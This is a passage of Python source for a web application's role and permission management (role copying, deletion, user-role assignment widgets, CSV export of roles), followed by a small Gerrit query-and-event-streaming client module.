elif r.http != "POST": r.error(405, current.ERROR.BAD_METHOD) db = current.db role = r.record if not role: r.error(400, current.ERROR.BAD_RECORD) # Find a suitable uuid and name table = r.table query = ((table.uuid.like("%s%%" % role.uuid)) | \ (table.role.like("%s%%" % role.role))) rows = db(query).select(table.uuid, table.role, ) uids = set(row.uuid for row in rows) names = set(row.role for row in rows) uid = name = None for i in range(2, 1000): if not uid: uid = "%s%s" % (role.uuid, i) if uid in uids: uid = None if not name: name = "%s-%s" % (role.role, i) if name in names: name = None if uid and name: break if not uid: uid = str(uuid.uuid4()) if not name: name = str(uuid.uuid4()) # Create the new role role_id = table.insert(uuid = uid, role = name, ) # Copy permissions ptable = current.auth.permission.table if ptable: query = (ptable.group_id == role.id) & \ (ptable.deleted == False) rules = db(query).select(ptable.controller, ptable.function, ptable.tablename, ptable.record, ptable.oacl, ptable.uacl, ptable.entity, ptable.unrestricted, ) for rule in rules: ptable.insert(group_id = role_id, controller = rule.controller, function = rule.function, tablename = rule.tablename, record = rule.record, oacl = rule.oacl, uacl = rule.uacl, entity = rule.entity, unrestricted = rule.unrestricted, ) message = current.T("New Role %(role)s created") % {"role": name} return current.xml.json_message(message=message) # ------------------------------------------------------------------------- @staticmethod def delete_role(r, **attr): """ Delete a role NB this function must be restricted to ADMINs (in apply_method) """ # CSRF Protection key = current.session["_formkey[admin/rolelist]"] if not key or r.post_vars.get("_formkey") != key: r.error(403, current.ERROR.NOT_PERMITTED) elif r.http not in ("POST", "DELETE"): r.error(405, current.ERROR.BAD_METHOD) role = r.record if not role: r.error(400, current.ERROR.BAD_RECORD) if role.protected or role.system: r.error(403, current.ERROR.NOT_PERMITTED) auth = current.auth auth.s3_delete_role(role.id) auth.s3_set_roles() message = current.T("Role %(role)s deleted") % {"role": role.role} return current.xml.json_message(message=message) # ------------------------------------------------------------------------- def assign_roles(self, r, **attr): """ Assign/unassign roles to a user NB this function is accessible for non-ADMINs (e.g. ORG_ADMIN) """ auth = current.auth # Require a primary record if not r.record: r.error(400, current.ERROR.BAD_RECORD) # Require permission to create or delete group memberships mtable = auth.settings.table_membership permitted = auth.s3_has_permission if not permitted("create", mtable) and not permitted("delete", mtable): r.unauthorised() # Require that the target user record belongs to a managed organisation pe_ids = auth.get_managed_orgs() if not pe_ids: r.unauthorised() elif pe_ids is not True: otable = current.s3db.org_organisation utable = auth.settings.table_user query = (utable.id == r.id) & \ (otable.id == utable.organisation_id) & \ (otable.pe_id.belongs(pe_ids)) row = current.db(query).select(utable.id, limitby=(0, 1)).first() if not row: r.unauthorised() # Which roles can the current user manage for this user? managed_roles = self.get_managed_roles(r.id) output = {} if r.http == "GET": T = current.T # Page Title userfield = auth.settings.login_userfield user_name = r.record[userfield] output["title"] = "%s: %s" % (T("Roles of User"), user_name) # Should we use realms? 
use_realms = auth.permission.entity_realm if use_realms: realm_types, realms = self.get_managed_realms() else: realm_types, realms = None, None # The Ajax URL for role updates ajax_url = r.url(id="[id]", representation="json") # The form field field = mtable.user_id field.readable = field.writable = True field.widget = S3RolesWidget(mode = "roles", items = managed_roles, use_realms = use_realms, realm_types = realm_types, realms = realms, ajax_url = ajax_url, ) # Render form s3 = current.response.s3 tablename = str(mtable) form = SQLFORM.factory(field, record = {"id": None, "user_id": r.id}, showid = False, labels = {field.name: ""}, formstyle = s3.crud.formstyle, table_name = tablename, upload = s3.download_url, #readonly = readonly, separator = "", submit_button = False, buttons = [], ) form.add_class("rm-form") output["form"] = form # Show a back-button since OrgAdmins have no other obvious # way to return to the list (no left menu) crud_button = S3CRUD.crud_button output["list_btn"] = crud_button(T("Back to User List"), icon = "return", _href = r.url(id="", method=""), ) # View response = current.response response.view = "admin/role_form.html" elif r.http == "POST": if r.representation == "json": # Read+parse body JSON s = r.body s.seek(0) try: options = json.load(s) except JSONERRORS: options = None if not isinstance(options, dict): r.error(400, "Invalid request options") user_id = r.record.id added = options.get("add") removed = options.get("remove") # Validate if added: for group_id, pe_id in added: role = managed_roles.get(group_id) if not role or role.get("a") is False: r.error(403, current.ERROR.NOT_PERMITTED) if removed: for group_id, pe_id in removed: role = managed_roles.get(group_id) if not role or role.get("r") is False: r.error(403, current.ERROR.NOT_PERMITTED) # Update role assignments if added: add_role = auth.s3_assign_role for group_id, pe_id in added: add_role(user_id, group_id, for_pe=pe_id) if removed: remove_role = auth.s3_withdraw_role for group_id, pe_id in removed: remove_role(user_id, group_id, for_pe=pe_id) output = current.xml.json_message(options=options) else: r.error(415, current.ERROR.BAD_FORMAT) else: r.error(405, current.ERROR.BAD_METHOD) return output # ------------------------------------------------------------------------- def assign_users(self, r, **attr): """ Assign/unassign users to a role NB this function could be accessible for non-ADMINs (e.g. ORG_ADMIN) """ auth = current.auth # Require a primary record role = r.record if not role: r.error(400, current.ERROR.BAD_RECORD) # Require permission to create or delete group memberships mtable = auth.settings.table_membership permitted = auth.s3_has_permission if not permitted("create", mtable) and not permitted("delete", mtable): r.unauthorised() # Require that the target role belongs to managed roles managed_roles = self.get_managed_roles(None) if role.id not in managed_roles: r.unauthorised() s3 = current.response.s3 # Which users can the current user manage? managed_users = self.get_managed_users(role.id) # Special rules for system roles sr = auth.get_system_roles() unrestrictable = (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS) unassignable = (sr.AUTHENTICATED, sr.ANONYMOUS) output = {} if r.http == "GET": T = current.T # Page Title output["title"] = "%s: %s" % (T("Users with Role"), role.role) # Should we use realms? 
use_realms = auth.permission.entity_realm and \ role.id not in unrestrictable if use_realms: realm_types, realms = self.get_managed_realms() else: realm_types, realms = None, None # The Ajax URL for role updates ajax_url = r.url(id="[id]", representation="json") # The form field field = mtable.group_id field.readable = field.writable = True field.widget = S3RolesWidget(mode="users", items = managed_users, use_realms = use_realms, realm_types = realm_types, realms = realms, ajax_url = ajax_url, ) # Render form tablename = str(mtable) form = SQLFORM.factory(field, record = {"id": None, "group_id": role.id}, showid = False, labels = {field.name: ""}, formstyle = s3.crud.formstyle, table_name = tablename, upload = s3.download_url, #readonly = readonly, separator = "", submit_button = False, buttons = [], ) form.add_class("rm-form") output["form"] = form # Default RHeader and View if "rheader" not in attr: return_btn = S3CRUD.crud_button("Back to Roles List", icon = "return", _href=r.url(id="", method=""), ) output["rheader"] = DIV(return_btn, _class="rheader", ) response = current.response response.view = "admin/role_form.html" elif r.http == "POST": if r.representation == "json": # Process Ajax-request from S3RolesWidget # Read+parse body JSON s = r.body s.seek(0) try: options = json.load(s) except JSONERRORS: options = None if not isinstance(options, dict): r.error(400, "Invalid request options") added = options.get("add") removed = options.get("remove") # Validate group_id = role.id if group_id in unassignable: r.error(403, current.ERROR.NOT_PERMITTED) if added: for user_id, pe_id in added: user = managed_users.get(user_id) if not user or user.get("a") is False: r.error(403, current.ERROR.NOT_PERMITTED) if removed: for user_id, pe_id in removed: user = managed_users.get(user_id) if not user or user.get("r") is False: r.error(403, current.ERROR.NOT_PERMITTED) # Update role assignments if added: add_role = auth.s3_assign_role for user_id, pe_id in added: add_role(user_id, group_id, for_pe=pe_id) if removed: remove_role = auth.s3_withdraw_role for user_id, pe_id in removed: remove_role(user_id, group_id, for_pe=pe_id) output = current.xml.json_message(options=options) else: r.error(415, current.ERROR.BAD_FORMAT) else: r.error(405, current.ERROR.BAD_METHOD) return output # ------------------------------------------------------------------------- @staticmethod def get_managed_users(role_id): """ Get a dict of users the current user can assign to roles @param role_id: the target role ID @returns: a dict {user_id: {l:label, t:title, a:assignable, r:removable, u:unrestrictable, }, ...} NB a, r and u attributes only added if non-default """ auth = current.auth auth_settings = auth.settings sr = auth.get_system_roles() admin_role = role_id == sr.ADMIN unassignable = role_id in (sr.AUTHENTICATED, sr.ANONYMOUS) unrestrictable = role_id in (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS) current_user = auth.user.id if auth.user else None users = {} pe_ids = auth.get_managed_orgs() if pe_ids: utable = auth_settings.table_user query = (utable.deleted == False) if pe_ids is not True: otable = current.s3db.org_organisation query &= (otable.id == utable.organisation_id) & \ (otable.pe_id.belongs(pe_ids)) userfield = auth_settings.login_userfield rows = current.db(query).select(utable.id, utable.first_name, utable.last_name, utable[userfield], ) for row in rows: user_id = row.id user = {"l": row[userfield], "t": "%s %s" % (row.first_name, row.last_name, ), } if unrestrictable: user["u"] = True if admin_role and 
user_id == current_user: # ADMINs cannot remove their own ADMIN role user["r"] = False if unassignable: user["a"] = user["r"] = False users[user_id] = user return users # ------------------------------------------------------------------------- @staticmethod def get_managed_roles(user_id): """ Get a dict of roles the current user can manage @returns: a dict {role_id: {l:label, a:assignable, r:removable, u:unrestrictable, }, ...}, NB a, r and u attributes only added if non-default """ auth = current.auth sr = auth.get_system_roles() AUTO = (sr.AUTHENTICATED, sr.ANONYMOUS) ADMINS = (sr.ADMIN, sr.ORG_ADMIN, sr.ORG_GROUP_ADMIN) UNRESTRICTABLE = (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS) table = auth.settings.table_group query = (table.hidden == False) & \ (table.deleted == False) rows = current.db(query).select(table.id, table.uuid, table.role, ) has_role = auth.s3_has_role roles = {} for row in rows: role = {"l": row.role or row.uuid} role_id = row.id if role_id in ADMINS: assignable = has_role(role_id) else: assignable = role_id not in AUTO if role_id == sr.ADMIN and auth.user.id == user_id: removable = False else: removable = assignable if not assignable: role["a"] = False if not removable: role["r"] = False if role_id in UNRESTRICTABLE: role["u"] = True roles[role_id] = role return roles # ------------------------------------------------------------------------- @staticmethod def get_managed_realms(): """ Get a dict of realms managed by the current user @returns: tuple (realm_types, realms): - realm_types = [(instance_type, label), ...] - realms = {pe_id: {l:label, t:type}, ...} """ T = current.T t_ = lambda v: s3_str(T(v)) realm_types = [(None, t_("Multiple"))] realms = {None: {"l": t_("Default Realm"), "t": None}, } # Look up the realms managed by the current user pe_ids = [] auth = current.auth sr = auth.get_system_roles() has_role = auth.s3_has_role is_admin = has_role(sr.ADMIN) if is_admin: # Only ADMIN can assign roles site-wide realms[0] = {"l": t_("All Entities"), "t": None} else: if has_role(sr.ORG_GROUP_ADMIN): role_realms = auth.user.realms[sr.ORG_GROUP_ADMIN] if role_realms: pe_ids.extend(role_realms) if has_role(sr.ORG_ADMIN): role_realms = auth.user.realms[sr.ORG_ADMIN] if role_realms: pe_ids.extend(role_realms) # Get entities and types s3db = current.s3db types = current.deployment_settings.get_auth_realm_entity_types() entities = s3db.pr_get_entities(pe_ids = pe_ids, types = types, group = True, show_instance_type = False, ) # Add representations for entities and types instance_type_nice = s3db.pr_pentity.instance_type.represent for instance_type in types: entity_group = entities.get(instance_type) if not entity_group: continue realm_types.append((instance_type, s3_str(instance_type_nice(instance_type)), )) for pe_id, name in entity_group.items(): realms[pe_id] = {"l": s3_str(name), "t": instance_type} return realm_types, realms # ------------------------------------------------------------------------- def import_roles(self, r, **attr): """ Interactive import of roles (auth_roles.csv format) NB this function must be restricted to ADMINs (in apply_method) """ # TODO implement roles importer T = current.T output = {} # Title output["title"] = T("Import Roles") # View response = current.response response.view = "admin/import_roles.html" return output # if GET: # show an import form # elif POST: # import the submitted file using Bulk-importer # ------------------------------------------------------------------------- @staticmethod def export_roles(r, **attr): """ Export of 
roles (auth_roles.csv format) NB this function must be restricted to ADMINs (in apply_method) """ output = S3RolesExport(r.resource).as_csv() # Response headers from gluon.contenttype import contenttype filename = "auth_roles.csv" disposition = "attachment; filename=\"%s\"" % filename response = current.response response.headers["Content-Type"] = contenttype(".csv") response.headers["Content-disposition"] = disposition return output.read() # ============================================================================= class S3PermissionWidget(object): """ Form widget to modify permissions of a role """ def __init__(self, role_id=None): """ Constructor """ sr = current.auth.get_system_roles() if role_id == sr.ANONYMOUS: default_roles = () elif role_id == sr.AUTHENTICATED: default_roles = (sr.ANONYMOUS,) else: default_roles = (sr.ANONYMOUS, sr.AUTHENTICATED) self.default_roles = default_roles # ------------------------------------------------------------------------- def __call__(self, field, value, **attributes): """ Form builder entry point @param field: the Field @param value: the current (or default) value of the field @param attributes: HTML attributes for the widget """ T = current.T # Widget ID widget_id = attributes.get("_id") or str(field).replace(".", "_") # Field name name = attributes.get("_name") or field.name # Page access rules tab+pane prules_id = "%s-prules" % widget_id prules_tab = LI(A(T("Page Access"), _href = "#" + prules_id, ) ) prules_pane = DIV(_id = prules_id, _class = "rm-page-rules", ) # Table access rules tab+page rules = current.auth.permission use_tacls = rules.use_tacls if use_tacls: trules_id = "%s-trules" % widget_id trules_tab = LI(A(T("Table Access"), _href = "#" + trules_id, ), ) trules_pane = DIV(_id = trules_id, _class = "rm-table-rules", ) else: trules_pane = "" trules_tab = "" # Construct the widget widget = DIV(INPUT(_type = "hidden", _name = name, _value = value, _id = widget_id + "-input", ), DIV(UL(trules_tab, prules_tab, ), trules_pane, prules_pane, _class = "rm-rules hide" ), _id = widget_id, ) # Module header icons rtl = current.response.s3.rtl icons = {"expanded": "fa fa-caret-down", "collapsed": "fa fa-caret-left" if rtl else "fa fa-caret-right", } # Client-side widget options widget_opts = {"fRules": rules.use_facls, "tRules": use_tacls, "useRealms": rules.entity_realm, "permissions": self.get_permissions(), "defaultPermissions": self.get_default_permissions(), "modules": self.get_active_modules(), "icons": icons, } if use_tacls: widget_opts["models"] = self.get_active_models() # Localized strings for client-side widget i18n = {"rm_Add": T("Add"), "rm_AddRule": T("Add Rule"), "rm_AllEntities": T("All Entities"), "rm_AllRecords": T("All Records"), "rm_AssignedEntities": T("Assigned Entities"), "rm_Cancel": T("Cancel"), "rm_CollapseAll": T("Collapse All"), "rm_ConfirmDeleteRule": T("Do you want to delete this rule?"), "rm_Default": T("default"), "rm_DeleteRule": T("Delete"), "rm_ExpandAll": T("Expand All"), "rm_NoAccess": T("No access"), "rm_NoRestrictions": T("No restrictions"), "rm_Others": T("Others"), "rm_OwnedRecords": T("Owned Records"), "rm_Page": T("Page"), "rm_RestrictedTables": T("Restricted Tables"), "rm_Scope": T("Scope"), "rm_SystemTables": T("System Tables"), "rm_Table": T("Table"), "rm_UnrestrictedTables": T("Unrestricted Tables"), } # Inject the client-side script self.inject_script(widget_id, widget_opts, i18n) return widget # ------------------------------------------------------------------------- @staticmethod def 
get_active_modules(): """ Get a JSON-serializable dict of active modules @returns: a dict {prefix: (name_nice, restricted)} """ # Modules where access rules do not apply (or are hard-coded) exclude = ("appadmin", "errors") # Active modules modules = current.deployment_settings.modules active= {k: (s3_str(modules[k].name_nice), modules[k].restricted) for k in modules if k not in exclude } # Special controllers for dynamic models if current.auth.permission.use_facls: active["default/dt"] = (s3_str(current.T("Dynamic Models")), True) return active # ------------------------------------------------------------------------- def get_active_models(self): """ Get a JSON-serializable dict of active data models @returns: a dict {prefix: {tablename: restricted}} """ # Get all table names db_tables = current.cache.ram("permission_widget_all_tables", self.get_db_tables, time_expire = 14400, ) # Count the number of restricting roles per table # @see: S3Permission.table_restricted() rtable = current.auth.permission.table query = (rtable.tablename != None) & \ (rtable.controller == None) & \ (rtable.function == None) & \ (rtable.deleted == False) numroles = rtable.group_id.count() tablename = rtable.tablename rows = current.db(query).select(tablename, numroles, groupby = tablename, ) restrictions = {row[tablename]: row[numroles] for row in rows} # Sort tablenames after module and mark number of restrictions models = {} for tablename in db_tables: prefix = tablename.split("_", 1)[0] if prefix in ("auth", "sync", "s3", "scheduler"): prefix = "_system" if prefix not in models: models[prefix] = {} models[prefix][tablename] = restrictions.get(tablename, 0) return models # ------------------------------------------------------------------------- @staticmethod def get_db_tables(): """ Return all table names in the database; in separate function to allow caching because it requires to load all models once @returns: db.tables """ db = current.db s3db = current.s3db # Load all static models s3db.load_all_models() # Load all dynamic tables (TODO: how does this make sense?) #ttable = s3db.s3_table #rows = db(ttable.deleted != True).select(ttable.name) #for row in rows: # s3db.table(row.name) return db.tables # ------------------------------------------------------------------------- @staticmethod def get_permissions(): """ Get a JSON-serializable list of permissions @returns: an ordered list of dicts: [{l: label, b: bit, o: relevant for owned records, }, ... ] """ permission = current.auth.permission opts = permission.PERMISSION_OPTS skip = 0x0000 # Hide approval-related permissions if record approval is disabled if not current.deployment_settings.get_auth_record_approval(): skip |= permission.REVIEW | permission.APPROVE output = [] for bit, label in opts.items(): if bit & skip: continue output.append({"l": s3_str(label), "b": bit, "o": bit != permission.CREATE, }) return output # ------------------------------------------------------------------------- def get_default_permissions(self): """ Get default permissions, i.e. 
those granted by roles the user has by default @returns: a dict {tablename: (uACL, oACL)} """ permissions = current.auth.permission table = permissions.table default_roles = self.default_roles default_permissions = {} if table and default_roles: query = (table.group_id.belongs(default_roles)) if not permissions.use_facls: query &= (table.function == None) if not permissions.use_tacls: query &= (table.tablename == None) query &= (table.deleted == False) rows = current.db(query).select(table.controller, table.function, table.tablename, table.uacl, table.oacl, ) for row in rows: target = row.tablename if not target: c = row.controller if c: target = "%s/%s" % (c, row.function or "*") else: continue rules = default_permissions.get(target) if rules: default_permissions[target] = (rules[0] | row.uacl, rules[1] | row.oacl, ) else: default_permissions[target] = (row.uacl, row.oacl) return default_permissions # ------------------------------------------------------------------------- def inject_script(self, widget_id, options, i18n): """ Inject the necessary JavaScript for the widget @param widget_id: the widget ID (=element ID of the person_id field) @param options: JSON-serializable dict of widget options @param i18n: translations of screen messages rendered by the client-side script, a dict {messageKey: translation} """ s3 = current.response.s3 # Static script if s3.debug: script = "/%s/static/scripts/S3/s3.ui.permissions.js" % \ current.request.application else: script = "/%s/static/scripts/S3/s3.ui.permissions.min.js" % \ current.request.application scripts = s3.scripts if script not in scripts: scripts.append(script) self.inject_i18n(i18n) # Widget options opts = {} if options: opts.update(options) # Widget instantiation script = '''$('#%(widget_id)s').permissionEdit(%(options)s)''' % \ {"widget_id": widget_id, "options": json.dumps(opts, separators=SEPARATORS), } jquery_ready = s3.jquery_ready if script not in jquery_ready: jquery_ready.append(script) # ------------------------------------------------------------------------- @staticmethod def inject_i18n(labels): """ Inject translations for screen messages rendered by the client-side script @param labels: dict of translations {messageKey: translation} """ strings = ['''i18n.%s="%s"''' % (k, s3_str(v)) for k, v in labels.items()] current.response.s3.js_global.append("\n".join(strings)) # ============================================================================= class S3RolesWidget(object): """ Form widget to assign roles to users """ def __init__(self, mode="roles", items=None, use_realms=False, realm_types=None, realms=None, ajax_url=None, ): """ Constructor @param mode: what to assign ("roles"|"users") @param items: the assignable items (roles or users), dict, structure see get_managed_roles/get_managed_users @param use_realms: boolean, whether to use realms @param realm_types: the realm types and their labels, tuple, format see get_managed_realms @param realms: the realms, dict, structure see get_managed_realms @param ajax_url: the URL for Ajax modification of assignments """ self.mode = mode self.items = items self.use_realms = use_realms self.realm_types = realm_types self.realms = realms self.ajax_url = ajax_url # ------------------------------------------------------------------------- def __call__(self, field, value, **attributes): """ Form builder entry point @param field: the Field @param value: the current (or default) value of the field @param attributes: HTML attributes for the widget """ T = current.T # Widget ID widget_id = 
attributes.get("_id") or str(field).replace(".", "_") # Field name name = attributes.get("_name") or field.name # Extract the current assignments if value: assignments = self.get_current_assignments(value) else: assignments = [] # Construct the widget widget = DIV(INPUT(_type = "hidden", _name = name, _value = value, _id = widget_id + "-id", ), INPUT(_type = "hidden", _name = "assigned", _value = json.dumps(assignments, separators=SEPARATORS), _id = widget_id + "-data", ), _id = widget_id, _class = "rm-assign-widget", ) # Client-side widget options widget_opts = {"mode": self.mode, "ajaxURL": self.ajax_url, "items": self.items, "useRealms": self.use_realms, "realms": self.realms, "realmTypes": self.realm_types, } # Localized strings for client-side widget if self.mode == "roles": CONFIRM = T("Do you want to remove the %(role)s role?") else: CONFIRM = T("Do you want to remove %(user)s from this role?") i18n = {"rm_Add": T("Add"), "rm_Cancel": T("Cancel"), "rm_ConfirmDeleteAssignment": CONFIRM, "rm_Delete": T("Delete"), "rm_DeletionFailed": T("Deletion Failed"), "rm_ForEntity": T("For Entity"), "rm_Roles": T("Roles"), "rm_SubmissionFailed": T("Submission Failed"), "rm_Users": T("Users"), } # Inject the client-side script self.inject_script(widget_id, widget_opts, i18n) return widget # ------------------------------------------------------------------------- def get_current_assignments(self, record_id): """ Get the current assignments for the user/role @param record_id: the user or role ID @returns: a list of tuples (roleID|userID, realmID) """ auth = current.auth table = auth.settings.table_membership if self.mode == "roles": query = (table.user_id == record_id) & \ (table.group_id.belongs(set(self.items.keys()))) field = table.group_id else: query = (table.group_id == record_id) & \ (table.user_id.belongs(set(self.items.keys()))) field = table.user_id use_realms = self.use_realms if use_realms and \ not auth.s3_has_role(auth.get_system_roles().ADMIN): managed_realms = set(self.realms.keys()) none = None in managed_realms managed_realms.discard(None) q = (table.pe_id.belongs(managed_realms)) if managed_realms else None if none: n = (table.pe_id == None) q = q | n if q else n if q: query &= q query &= (table.deleted == False) rows = current.db(query).select(field, table.pe_id) assignments = set() for row in rows: pe_id = row.pe_id if use_realms else None assignments.add((row[field], pe_id)) return list(assignments) # ------------------------------------------------------------------------- def inject_script(self, widget_id, options, i18n): """ Inject the necessary JavaScript for the widget @param widget_id: the widget ID (=element ID of the person_id field) @param options: JSON-serializable dict of widget options @param i18n: translations of screen messages rendered by the client-side script, a dict {messageKey: translation} """ s3 = current.response.s3 # Static script if s3.debug: script = "/%s/static/scripts/S3/s3.ui.roles.js" % \ current.request.application else: script = "/%s/static/scripts/S3/s3.ui.roles.min.js" % \ current.request.application scripts = s3.scripts if script not in scripts: scripts.append(script) self.inject_i18n(i18n) # Widget options opts = {} if options: opts.update(options) # Widget instantiation script = '''$('#%(widget_id)s').roleManager(%(options)s)''' % \ {"widget_id": widget_id, "options": json.dumps(opts, separators=SEPARATORS), } jquery_ready = s3.jquery_ready if script not in jquery_ready: jquery_ready.append(script) # 
------------------------------------------------------------------------- @staticmethod def inject_i18n(labels): """ Inject translations for screen messages rendered by the client-side script @param labels: dict of translations {messageKey: translation} """ strings = ['''i18n.%s="%s"''' % (k, s3_str(v)) for k, v in labels.items()] current.response.s3.js_global.append("\n".join(strings)) # ============================================================================= class S3RolesExport(object): """ Roles Exporter """ def __init__(self, resource): """ Constructor @param resource: the role resource (auth_group) with REST filters; or None to export all groups """ db = current.db auth = current.auth # Optional columns self.col_hidden = False self.col_protected = False self.col_entity = False # Look up the roles gtable = auth.settings.table_group fields = ("id", "uuid", "role", "description", "hidden", "protected", "system", ) if resource and resource.tablename == str(gtable): roles = resource.select(fields, as_rows=True) else: query = (gtable.deleted == False) roles = db(query).select(*fields) # Generate roles dict role_dicts = {} for role in roles: role_dict = {"uid": role.uuid, "role": role.role, "description": role.description, } if role.hidden: self.col_hidden = True role_dict["hidden"] = "true" if role.protected and not role.system: self.col_protected = True role_dict["protected"] = "true" role_dicts[role.id] = role_dict self.roles = role_dicts # Look up all rules, ordered by UID, controller, function, table rtable = auth.permission.table query = (rtable.group_id.belongs(set(role_dicts.keys()))) & \ (rtable.deleted == False) rules = db(query).select(rtable.id, rtable.group_id, rtable.controller, rtable.function, rtable.tablename, rtable.uacl, rtable.oacl, rtable.entity, ) self.rules = rules # Look up all org entities entities = set() for rule in rules: entity = rule.entity if entity is not None: self.col_entity = True entities.add(entity) otable = current.s3db.org_organisation query = (otable.pe_id.belongs(entities)) & \ (otable.deleted == False) self.orgs = db(query).select(otable.pe_id, otable.name, ).as_dict(key="pe_id") # ------------------------------------------------------------------------- def as_csv(self): """ Export the current roles and permissions as CSV, suitable for prepop (see S3BulkImporter.import_role) @returns: a StringIO containing the CSV """ import csv # Optional columns col_protected = self.col_protected col_hidden = self.col_hidden col_entity = self.col_entity # Role fields fieldnames = ["uid", "role", "description"] if col_hidden: fieldnames.append("hidden") if col_protected: fieldnames.append("protected") # Rule fields fieldnames.extend(["controller", "function", "table", "uacl", "oacl"]) if col_entity: fieldnames.append("entity") # Helper to get the role UID for a rule role_dicts = self.roles def get_uid(group_id): role_dict = role_dicts.get(group_id) return role_dict.get("uid") if role_dict else None # Sort the rules rules = sorted(self.rules, key = lambda rule: (get_uid(rule.group_id), rule.controller or "zzzzzz", rule.function or "", rule.tablename or "", )) # Create the CSV f = StringIO() writer = csv.DictWriter(f, fieldnames=fieldnames) writer.writeheader() # Write the rules to the CSV orgs = self.orgs encode_permissions = self.encode_permissions for rule in rules: role_dict = role_dicts.get(rule.group_id) if not role_dict: continue rule_dict = {} # The entity column (optional) if col_entity: entity = rule.entity if entity is not None: if entity == 0: 
rule_dict["entity"] = "any" else: org = orgs.get(entity) if org: rule_dict["entity"] = org else: continue # The target columns (controller, function, table) if rule.tablename: rule_dict["table"] = rule.tablename else: if rule.controller: rule_dict["controller"] = rule.controller if rule.function: rule_dict["function"] = rule.function # The permission columns (uacl, oacl) uacl = encode_permissions(rule.uacl, explicit_none=True) if uacl: rule_dict["uacl"] = uacl oacl = encode_permissions(rule.oacl & ~(rule.uacl)) if oacl: rule_dict["oacl"] = oacl # Add role columns rule_dict.update(role_dict) # Write the rule writer.writerow(rule_dict) f.seek(0) return f # ------------------------------------------------------------------------- @staticmethod def encode_permissions(permissions, explicit_none=False): """ Encodes a permission bitmap as string, using the permission labels from S3Permission.PERMISSION_OPTS @param permissions: the permission bitmap @param explicit_none: return "NONE" if no permission bit set (otherwise returns None) """ if not permissions: if explicit_none: return "NONE" else: return None opts = current.auth.permission.PERMISSION_OPTS labels = [] for bit in opts: if permissions & bit: labels.append(opts[bit]) return "|".join(labels) # END =========================================================================
mit
2,148,195,638,398,239,000
34.396073
119
0.441798
false
4.9062
false
false
false
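The role exporter in the module above serializes permission bitmaps as "|"-separated labels (see S3RolesExport.encode_permissions). Below is a minimal standalone sketch of that encoding idea; the bit values and labels are illustrative assumptions, not Sahana's actual PERMISSION_OPTS table.

from collections import OrderedDict

# Illustrative bit assignments; the real table lives in
# S3Permission.PERMISSION_OPTS and may differ.
PERMISSION_OPTS = OrderedDict([
    (0x0001, "CREATE"),
    (0x0002, "READ"),
    (0x0004, "UPDATE"),
    (0x0008, "DELETE"),
])

def encode_permissions(permissions, explicit_none=False):
    # No bits set: either an explicit "NONE" marker or None
    if not permissions:
        return "NONE" if explicit_none else None
    # Join the label of every bit present in the bitmap
    return "|".join(label for bit, label in PERMISSION_OPTS.items()
                    if permissions & bit)

print encode_permissions(0x0003)                 # CREATE|READ
print encode_permissions(0, explicit_none=True)  # NONE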
berrange/gerrymander
gerrymander/operations.py
1
5420
# # Copyright (C) 2014 Red Hat, Inc # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from gerrymander.model import ModelChange from gerrymander.model import ModelEvent class OperationBase(object): def __init__(self, client): self.client = client class OperationQuery(OperationBase): PATCHES_NONE = "none" PATCHES_CURRENT = "current" PATCHES_ALL = "all" STATUS_SUBMITTED = "submitted" STATUS_REVIEWED = "reviewed" STATUS_MERGED = "merged" STATUS_ABANDONED = "abandoned" STATUS_OPEN = "open" STATUS_CLOSED = "closed" def __init__(self, client, terms={}, rawquery=None, patches=PATCHES_NONE, approvals=False, files=False, comments=False, deps=False): OperationBase.__init__(self, client) self.terms = terms self.rawquery = rawquery self.patches = patches self.approvals = approvals self.files = files self.comments = comments self.deps = deps if self.patches == OperationQuery.PATCHES_NONE: if self.approvals: raise Exception("approvals cannot be requested without patches") if self.files: raise Exception("files cannot be requested without patches") def get_args(self, limit=None, offset=None, sortkey=None): args = ["query", "--format=JSON"] if self.patches == OperationQuery.PATCHES_CURRENT: args.append("--current-patch-set") elif self.patches == OperationQuery.PATCHES_ALL: args.append("--patch-sets") if self.approvals: args.append("--all-approvals") if self.files: args.append("--files") if self.comments: args.append("--comments") if self.deps: args.append("--dependencies") clauses = [] if offset is not None: args.append("--start") args.append("%d" % offset) if limit is not None: clauses.append("limit:" + str(limit)) if sortkey is not None: clauses.append("resume_sortkey:" + sortkey) if self.rawquery is not None: clauses.append("(" + self.rawquery + ")") terms = list(self.terms.keys()) terms.sort() for term in terms: negateAll = False terms = self.terms[term] if len(terms) > 0 and terms[0] == "!": negateAll = True terms = terms[1:] if len(terms) == 0: continue subclauses = [] for value in terms: subclauses.append("%s:%s" % (term, value)) clause = " OR ".join(subclauses) if negateAll: clause = "( NOT ( " + clause + " ) )" else: clause = "( " + clause + " )" clauses.append(clause) args.append(" AND ".join(clauses)) return args def run(self, cb, limit=None): class tracker(object): def __init__(self): self.gotany = True self.count = 0 self.sortkey = None self.has_more = False c = tracker() def mycb(line): if 'rowCount' in line: # New gerrit sets 'moreChanges' if 'moreChanges' in line: c.has_more = line['moreChanges'] return if 'type' in line and line['type'] == "error": raise Exception(line['message']) change = ModelChange.from_json(line) # Old gerrit sets 'sortKey' if "sortKey" in line: c.sortkey = line["sortKey"] c.gotany = True c.count = c.count + 1 cb(change) if limit is None: while c.gotany: c.gotany = False offset = None if c.has_more: offset = c.count self.client.run(self.get_args(500, offset, c.sortkey), mycb) if not c.sortkey and not c.has_more: break else: while c.count < limit and c.gotany: want = limit - c.count if 
want > 500: want = 500 c.gotany = False offset = None if c.has_more: offset = c.count self.client.run(self.get_args(want, offset, c.sortkey), mycb) if not c.sortkey and not c.has_more: break return 0 class OperationWatch(OperationBase): def __init__(self, client): OperationBase.__init__(self, client) def run(self, cb): def mycb(line): event = ModelEvent.from_json(line) if event: cb(event) return self.client.run(["stream-events"], mycb)
apache-2.0
132,657,920,464,158,480
31.071006
80
0.533948
false
4.185328
false
false
false
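OperationQuery above turns its terms dict into a Gerrit search string: the values of one term are OR-ed together, the per-term clauses are AND-ed, and a leading "!" marks a term whose whole clause is negated. A minimal standalone sketch of that composition follows; the terms dict is illustrative, not taken from a real query.

def build_query(terms):
    clauses = []
    for term in sorted(terms):
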